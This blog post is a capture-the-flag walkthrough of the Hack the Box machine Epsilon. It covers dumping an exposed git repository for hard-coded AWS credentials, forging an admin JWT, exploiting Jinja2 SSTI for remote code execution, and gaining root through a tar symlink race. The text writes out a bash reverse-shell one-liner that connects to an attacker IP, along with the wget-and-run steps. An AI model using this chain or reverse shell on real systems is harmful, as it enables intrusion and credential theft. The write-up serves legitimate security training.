Hello Everyone! Today we will be doing another Recommended Machine from Hack the Box, Epsilon.
1)Kicking off with nmap / rustscan scan as usually:
data:image/s3,"s3://crabby-images/08b78/08b788ea2524954b7acae6b453771ca5da88af23" alt=""
2 web servers running on port 80 and port 5000 respectfully and 1 SSH Server. Let’s enumerate more closely Web Servers as it appears that will be our initial foothold.
2)On port 80 we are getting 403 Forbidden error message, but regardless we should perform subdomain & directory brute-forcing
data:image/s3,"s3://crabby-images/251cc/251ccf487fa31ff0c0a16cd7b471f5bb815e6c32" alt=""
For directory brute-forcing I will use dirsearch:
data:image/s3,"s3://crabby-images/1f4bb/1f4bb541ae41ec4cfee018f5da250b905991df39" alt=""
2.1)Interestingly, dirsearch identified a hidden git directory which can always be interesting, we can try to recover deleted files, check for commits, etc. For that, I will use tool written in Python – git dumper which can be found here: https://github.com/arthaud/git-dumper
data:image/s3,"s3://crabby-images/a6a83/a6a8347da901a7110d469713f7ab79d08a8b8a4a" alt=""
Checking the output of git dumper we got 2 Python files and .git directory.
data:image/s3,"s3://crabby-images/03c07/03c07ce523f0638b3062527602e74a6d81f15154" alt=""
Whenever I face .git directory I like to run few commands such as :
git status ---> checks for status of git repo
git restore . ---> restores deleted files
git log ---> shows us commites and their hashes
git show <HASH_ID> ---> show the commit
data:image/s3,"s3://crabby-images/92dfa/92dfa77e3f9e27e6fbb5832ff8ed0601abc4f092" alt=""
2.2)We can check each commit to see if we can find something interesting:
data:image/s3,"s3://crabby-images/4beea/4beea66319ea5d967f9160b8ae84ce393175ecaa" alt=""
This one looks particularly interesting as we can see AWS Credentials being hard-coded. Which means that we can use aws cli locally after configuring the new profile with this set of credentials. Before doing so, let’s check other 2 Python files as we might get a better picture of where and how these AWS credentials are being used.
2.3)Server.py represents a Flask Application:
data:image/s3,"s3://crabby-images/1c68f/1c68f16beefc8f247df012691ef4d3b8ed23f2db" alt=""
From here we can see that we need to pass admin:admin credentials in order to login as POST Request to the / endpoint. However, there is JWT in play as the application checks if our username is equal to admin inside the JWT Token which is called auth token in this case. Now JWT Tokens are protected with the secret as we can see on line 7, and without the secret, we can’t forge this token in order to authenticate to this Flask application on port 5000.
2.4)In other Python file we can see usage of AWS Credentials with AWS Lambda:
data:image/s3,"s3://crabby-images/5f557/5f5574bbbfe2eb7d65a5fcf73beea69b88964cff" alt=""
From here we can obtain the endpoint_url for Lambda which can be combined with AWS Credentials from the .git commit to list all Lambda functions from that endpoint. Let’s do it!
First we need to configure AWS profile with new set of credentials that we found:
data:image/s3,"s3://crabby-images/02fa6/02fa634b9b564b5c40ce339230fab7f3f7013bfe" alt=""
Then, we can list all Lambda functions from http://cloud.epsilon.htb
data:image/s3,"s3://crabby-images/67c63/67c63790edb44a079a0580e4498a8075468f0fec" alt=""
There is only 1! And the name of it is costume_shop_v1, we can now use get-function command from the aws cli to download this Lambda function to our machine:
data:image/s3,"s3://crabby-images/83524/8352425ebb209777f66a1acad19c6a3db5d9cc77" alt=""
Navigating to the Location URL we can download the source code for this Lambda function, which reveals JWT Secret
data:image/s3,"s3://crabby-images/722da/722daab33476110937543e2d58fd7a5c2878bf14" alt=""
2.5)Cool! With JWT Secret now we can forge our own JWT Token and set the username value of it to be equal to the admin as that is what the code in server.py checks for! For that, I will use https://jwt.io. Simply use the JWT Token that is already provided and on the right-hand side edit the payload, Here I added username key with value of admin:
data:image/s3,"s3://crabby-images/8ebe5/8ebe548344fda2487ca6290087a6ac2a23ed735d" alt=""
Make sure that in Verify Signature Section to provide the JWT Tokent that we just found in Lambda function. Then copy the JWT Token.
3)Now we need to set the Cookie name to auth and the value of JWT Token, there are various ways to do so, but in this case I will use Firefox Extension: Cookie Editor https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/
data:image/s3,"s3://crabby-images/9250c/9250c561b357dcb08313a5ec8f0e3149d9d7e5b6" alt=""
And we are authenticated! Cool! Now we can visit other endpoints defined in the code.
3.1)The code base is not huge, and there is only a few endpoints. However /order looks the most interesting because of the following code:
data:image/s3,"s3://crabby-images/60f3c/60f3cc8047bc9338c1ee2f5e7d0456376c4fc07f" alt=""
We can see here that we can order some products and then the message variable is rendered within the template containing the name of the costume variable without any sanitization leading to Server-Side Template Injection. The problem here arises because we can manipulate with the costume variable by intercepting / repeating Requests with Proxy tools such as Burp. Here is the flow:
First, we can select a costume to buy:
data:image/s3,"s3://crabby-images/2d615/2d6158c87c1cd56a2bb56b2e441dcc4f8b0d3b1f" alt=""
Since we know this is Flask Application, and Flask applications usually uses Jinja2 as a Templating engine, we can try to exploit this SSTI with some basic payloads such as:
{{7*7}} ---> this should resolve to 49 if app is vulnerable
data:image/s3,"s3://crabby-images/36209/362091a575f73b2d3694a3ddbf1bf77403597def" alt=""
Cool! We confirmed the SSTI vulnerability. This is very dangerous as we now have RCE:
3.2)Now, there are various payloads that we can use to achieve RCE, for an example we can use this one to read the content of /etc/passwd file:
data:image/s3,"s3://crabby-images/5af72/5af723381f6941c225b7b52bab0cb26a07de87a1" alt=""
However I found this one better working and more stable:
data:image/s3,"s3://crabby-images/da363/da363f2295a9336b29fa68b5166d8d3e7d3a3777" alt=""
Now, I will create bash reverse shell payload locally, transfer it to the remote machine via wget, make it executable with chmod and then execute it with bash for the reverse shell:
First we can create locally bash reverse shell payload, I will use this one:
bash -c "bash -i >& /dev/tcp/10.10.10.10/1234 0>&1"
I will name it as revshell.sh
Then I will transfer it to the target machine via wget (I firstly checked if wget is installed on remote host by running wget –version)
data:image/s3,"s3://crabby-images/17a5f/17a5ff5d316a2c08cc13dc3fce64251cc02da85e" alt=""
Next, we can make it executable:
chmod +x /tmp/revshell.sh
data:image/s3,"s3://crabby-images/f87be/f87be9538a0a4da4478a684c67fbfa0b7365f923" alt=""
Finally, we start netcat listener on port 1234 in this case, and we execute our payload as:
bash /tmp/revshell.sh
And we got reverse shell, and user.txt!
data:image/s3,"s3://crabby-images/62ed4/62ed4bb05dc90ecbdabc81dc01aabc126c6b8eea" alt=""
4)After some initial manual enumeration I didn’t find much, so I transferred linpeas and started automated enumeration. However, that didn’t give me much either. Whenever I am in situation like this and I am on Linux Machine I like to transfer Pspy and to look for running processes on the target machine.
I transferred pspy via wget, made it executable and ran it:
data:image/s3,"s3://crabby-images/44a2e/44a2ed60703a55f7f06109ab113051869857bd6f" alt=""
And I found something interesting, there is a process using /usr/bin/backup.sh script very often:
data:image/s3,"s3://crabby-images/ced23/ced23fa8a683d84fe2e6d033dc93b10b7dc087e7" alt=""
Here is the script:
data:image/s3,"s3://crabby-images/46ec9/46ec9a7a292d21c9c27089ef5bd019293c7daf6c" alt=""
4.1)The issue here is that this script runs as sudo user on during the second usage of tar -h flag is passed as well.The script blindly processes the /opt/backups/checksum
that is created file without validating its contents or checking its integrity. So let’s summarize what the script does:
1)creates temporary file
2)first script removes everything from the /opt/backups with rm -rf command
3)with tar created an archive at /var/www/app
4)using sha1sum it created checksum file at /opt/backups
5)sleeps for 5 seconds
6)uses tar again but this time with -h flag on previosuly creaed tar file and checksum file and place it in /var/backups/web_backups
We can abuse this script because -h flag in tar treats symlinks as their targets instead of copying the symlink itself. So that means that after checksum file is created in the time period of 5 seconds we have to replace checksum file with malicious symlink! Sounds to me like a perfect task for Chatgpt:
data:image/s3,"s3://crabby-images/bee72/bee723fceb26b771df6d69bd13b6814fd334b7ea" alt=""
Essentially what the script does is regularly check if there is a .tar file in the /opt/backups and if it is, then it checks for a checksum file which during the short windows of 5 seconds replaces with the symlink to the location as we wish that we can define in sensitive_file variable. So I created this script on the remote machine and ran it. In order to trigger it I obtained another reverse shell from SSTI RCE and just created something in /opt/backups folder:
data:image/s3,"s3://crabby-images/a87c5/a87c5056c3713b9e868336ff92c83f32e2b218f4" alt=""
Now checking the web_backups directory we can confirm that tar file has been created, and we can extract content of it to the tmp directory:
data:image/s3,"s3://crabby-images/4166b/4166b7c04232f1e45fee87a7295b45fdd8f47317" alt=""
Navigating to the /tmp and then /opt/backups/checksum we can find root directory as that is what I placed for sensitive_file variable to replace checksum file in the time windows of 5 seconds:
data:image/s3,"s3://crabby-images/a2625/a26254cf6369f3946a7f9325a613099fbb8a114b" alt=""
Lessons Learned
1)Very cool machine! I definitely learned about different payloads for achieving RCE with Flask(Jinja2) SSTI.
2)Learned a lot about the -h flag that can be passed to tar and why it can be dangerous because of the way how it handles the symlinks
Leave a Reply